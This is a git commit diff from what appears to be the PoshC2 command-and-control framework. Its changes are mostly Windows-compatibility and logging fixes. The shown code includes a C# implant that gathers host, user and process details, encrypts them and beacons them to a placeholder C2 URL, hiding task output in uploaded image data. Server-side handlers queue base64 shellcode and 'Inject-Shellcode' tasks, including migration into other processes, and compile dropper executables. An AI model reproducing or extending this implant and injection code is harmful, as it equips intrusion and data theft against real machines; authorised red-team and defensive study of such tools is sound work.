Use pyreadline for Windows compatibility and when injecting shellcode log filename

temp
m0rv4i 2019-04-24 18:18:30 +01:00
parent ae3c5ed3cf
commit 0aaa5ce53c
11 changed files with 36 additions and 31 deletions

View File

@ -1,4 +1,5 @@
#!/usr/bin/env python
import os
from UrlConfig import UrlConfig
HOST_NAME = '0.0.0.0'
@ -56,12 +57,12 @@ ServerHeader = "Apache"
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
# DO NOT CHANGE #
FilesDirectory = "%sFiles/" % POSHDIR
PayloadsDirectory = "%spayloads/" % ROOTDIR
ModulesDirectory = "%sModules/" % POSHDIR
DownloadsDirectory = "%sdownloads/" % ROOTDIR
ReportsDirectory = "%sreports/" % ROOTDIR
Database = "%s/PowershellC2.SQLite" % ROOTDIR
FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
# DO NOT CHANGE #
# These rules aren't needed as you'll find them auto-generated within the project folder now.

View File

@ -1,9 +1,9 @@
#!/usr/bin/python
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
from Config import HTTPResponses, POSHDIR, PayloadsDirectory
from Utils import randomuri
from TabComplete import readline, tabCompleter
from TabComplete import tabCompleter
from Help import COMMANDS
def default_response():

View File

@ -77,7 +77,7 @@ public class Program
x.Headers.Add("Referrer", "#REPLACEREFERER#");
if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
return x;
}
@ -188,7 +188,7 @@ public class Program
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
@ -331,7 +331,7 @@ public class Program
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
}
}
@ -502,7 +502,7 @@ public class Program
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
}
output.AppendLine(strOutput.ToString());
@ -519,7 +519,7 @@ public class Program
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);

View File

@ -1,6 +1,6 @@
#!/usr/bin/python
import sys, re, os, readline, time, subprocess, traceback, signal, argparse
import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
from sqlite3 import Error
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails

View File

@ -1,4 +1,4 @@
import base64, re, traceback, os, sys
import base64, re, traceback, os, sys, readline, pyreadline.rlmain
from Alias import ps_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter
from TabComplete import tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
try:
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
arch = "86"
if implant_comms == "Normal":
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
shellcodefile = load_file(path)
elif implant_comms == "Proxy":
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)

View File

@ -190,7 +190,8 @@ class Payloads(object):
output_file.write(cs9)
output_file.close()
if os.name == 'nt':
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
else:
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)

View File

@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
try:
shellcodefile = load_file(path)
if shellcodefile != None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)

View File

@ -1,6 +1,6 @@
#!/usr/bin/python
import os, sys, readline, glob
import os, sys, readline, pyreadline.rlmain, glob
class tabCompleter(object):
"""

View File

@ -19,12 +19,9 @@ def newTask(path):
user_command = command
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith('upload-file')):
filepath = command.replace('upload-file', '')
if ";" in filepath:

View File

@ -14,6 +14,8 @@ Add a configurable jitter to all implants
Update the notifications config if it is changed in the Config.py
Add NotificationsProjectName in Config.py which is displayed in notifications message
Add fpc script which searches the Posh DB for a particular command
Use pyreadline for Windows compatibility
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
4.8 (13/02/19)
==============

View File

@ -1,4 +1,5 @@
pyopenssl
pandas
pyttsx3
pycrypto
pycrypto
pyreadline